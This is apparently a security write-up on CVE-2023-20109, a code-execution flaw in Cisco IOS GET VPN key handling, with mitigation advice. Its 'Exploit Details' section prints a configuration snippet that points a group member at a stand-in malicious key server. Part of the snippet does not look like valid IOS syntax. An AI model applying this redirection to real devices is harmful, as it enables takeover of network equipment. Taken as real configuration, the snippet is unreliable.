A critical vulnerability has been identified in the Group Encrypted Transport VPN (GET VPN) feature of Cisco IOS Software and Cisco IOS XE Software, with the designation CVE-2023-20109. An authenticated, remote attacker with administrative control of either a group member or a key server can exploit this vulnerability to execute arbitrary code on an affected device, gain full control of the system, or cause the device to crash, leading to a denial of service (DoS) condition.
Details [#details]
The vulnerability arises due to insufficient validation of attributes in the Group Domain of Interpretation (GDOI) and G-IKEv2 protocols of the GET VPN feature. By compromising an installed key server or modifying the configuration of a group member to point to a malicious key server, an attacker can execute arbitrary code and gain full control of the affected system or cause the affected system to reload, resulting in a DoS condition.
Exploit Details
To exploit this vulnerability, an attacker must first gain administrative control of either a group member or a key server. Once administrative control is achieved, the attacker can either compromise an installed key server or modify the configuration of a group member to point to a malicious key server controlled by the attacker.
The following code snippet demonstrates how an attacker could modify a group member configuration to point to a malicious key server:
! Attacker-controlled key server
key server hostname malicious-key-server.example.com
! Modify group member configuration
crypto gdoi group example-group
identity number 12345
server address ipv4 malicious-key-server.example.com
Affected Products
This vulnerability impacts Cisco IOS Software and Cisco IOS XE Software with support for GET VPN.
Solution
Cisco has released a software update to address the CVE-2023-20109 vulnerability. Customers are advised to apply the necessary updates to their affected devices to mitigate the risk of exploitation.
For detailed information on how to apply the update, please refer to the following link: Cisco IOS Software and Cisco IOS XE Software updates
Original References
- Cisco Security Advisory: CVE-2023-20109
- National Vulnerability Database (NVD): CVE-2023-20109
Conclusion
The CVE-2023-20109 vulnerability presents a significant security risk to organizations using the Cisco GET VPN feature in Cisco IOS Software and Cisco IOS XE Software. By exploiting this vulnerability, attackers can execute arbitrary code, gain full control of an affected system, or cause a denial of service (DoS) condition. It is crucial for administrators to update their devices to protect themselves from potential exploitation.
Timeline
Published on: 09/27/2023 18:15:10 UTC
Last modified on: 10/05/2023 17:39:30 UTC